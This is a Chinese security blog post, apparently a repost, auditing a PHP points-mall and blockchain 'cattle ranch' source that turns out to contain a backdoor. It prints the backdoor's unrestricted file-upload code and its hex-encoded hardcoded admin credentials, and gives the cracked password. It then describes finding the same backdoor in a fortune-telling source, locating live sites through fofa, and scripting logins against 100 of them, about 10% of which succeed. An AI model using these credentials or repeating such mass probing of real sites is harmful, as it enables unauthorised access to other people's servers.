Wo槽,有后门-某区块、积分商城代码审计分享

admin
admin
admin
138693
文章
114
评论
2024年2月24日15:03:19评论29 views字数 1790阅读5分58秒阅读模式

请遵守法律法规,合法冲浪

本文仅作知识分享用

一切直接或间接由于本文所造成的后果与本人无关

写在前面

在审计代码时发现源码被留后门,在GitHub上关键字找到另外一套相同后门的源码,欲知后事如何,且看下文分解。没有技术,看个乐呵

系统简介

【牧场养牛】带积分商城+抽奖+会员特权 区块源码。

开发语言:PHP开发框架:ThinkPHP3

Wo槽,有后门-某区块、积分商城代码审计分享

代码分析

开头即是王炸

鄙人喜欢直接,遂从文件上传开始看。Seay!!!启动!!!

Wo槽,有后门-某区块、积分商城代码审计分享

ohhhhhh,出货了。看了下没有上传限制,可以上传任意文件。

if (!empty($_FILES) && !FM_READONLY) {    $override_file_name = false;    $f = $_FILES;    $path = FM_ROOT_PATH;    $ds = DIRECTORY_SEPARATOR;    if (FM_PATH != '') {        $path .= '/' . FM_PATH;    }    $errors = 0;    $uploads = 0;    $allowed = (FM_UPLOAD_EXTENSION) ? explode(',', FM_UPLOAD_EXTENSION) : false;    $filename = $f['file']['name'];    $tmp_name = $f['file']['tmp_name'];    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));    $isFileAllowed = ($allowed) ? in_array($ext, $allowed) : true;    $targetPath = $path . $ds;    $fullPath = $path . '/' . $_REQUEST['fullpath'];    $folder = substr($fullPath, 0, strrpos($fullPath, "/"));    if(file_exists ($fullPath) && !$override_file_name) {        $ext_1 = $ext ? '.'.$ext : '';        $fullPath = str_replace($ext_1, '', $fullPath) .'_'. date('ymdHis'). $ext_1;    }    if (!is_dir($folder)) {        $old = umask(0);        mkdir($folder, 0777, true);        umask($old);    }    if (empty($f['file']['error']) && !empty($tmp_name) && $tmp_name != 'none' && $isFileAllowed) {        if (move_uploaded_file($tmp_name, $fullPath)) {            die('Successfully uploaded');        } else {            die(sprintf('Error while uploading files. Uploaded files: %s', $uploads));        }    }    exit();}

就在我研究怎么调用的时候,什么东西?还要登录?奇奇怪怪的。

Wo槽,有后门-某区块、积分商城代码审计分享

于是直接访问文件看看,页面长这样,随便输点东西回车,创建失败??

Wo槽,有后门-某区块、积分商城代码审计分享

这里一定不简单,于是仔细研究了一下,在代码的开头发现了奇怪的东西。(hex编码的账户密码)

$auth_users=array(pack(chr(72).chr(42),"61646D696E")=>pack(chr(72).chr(42),"2432792431302456494437394D76382F6335776F776B6935726F69644F777169332F53384F6453386B775A2E784E6C656D4B753252504C55376C2E47"),);

哦??有戏!!!用户名是admin,密码是Bcrypt,需要爆破一下。

Wo槽,有后门-某区块、积分商城代码审计分享

Wo槽,有后门-某区块、积分商城代码审计分享

这里因为已经知道密码了,所以就不演示密码的爆破过程了,ok,密码是“mima123”。

Wo槽,有后门-某区块、积分商城代码审计分享

登录成功!! 文件管理器????

Wo槽,有后门-某区块、积分商城代码审计分享

传一个phpinfo试试,直接起飞!!!!

Wo槽,有后门-某区块、积分商城代码审计分享

Wo槽,有后门-某区块、积分商城代码审计分享

梅开二度

后面试了试关键字在GitHub上找找有没有同样后门的源码,确实找到了一套用得比较多的源码(算命、八字源码),后面也是在fofa上查了一下,还行。

Wo槽,有后门-某区块、积分商城代码审计分享

用脚本跑了前100条,10%,也还行吧。就算命吧,一算一个不吱声。

Wo槽,有后门-某区块、积分商城代码审计分享

关机,开溜!

Wo槽,有后门-某区块、积分商城代码审计分享

原文始发于微信公众号(不够安全):Wo槽,有后门-某区块、积分商城代码审计分享

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月24日15:03:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Wo槽,有后门-某区块、积分商城代码审计分享https://cn-sec.com/archives/2522378.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息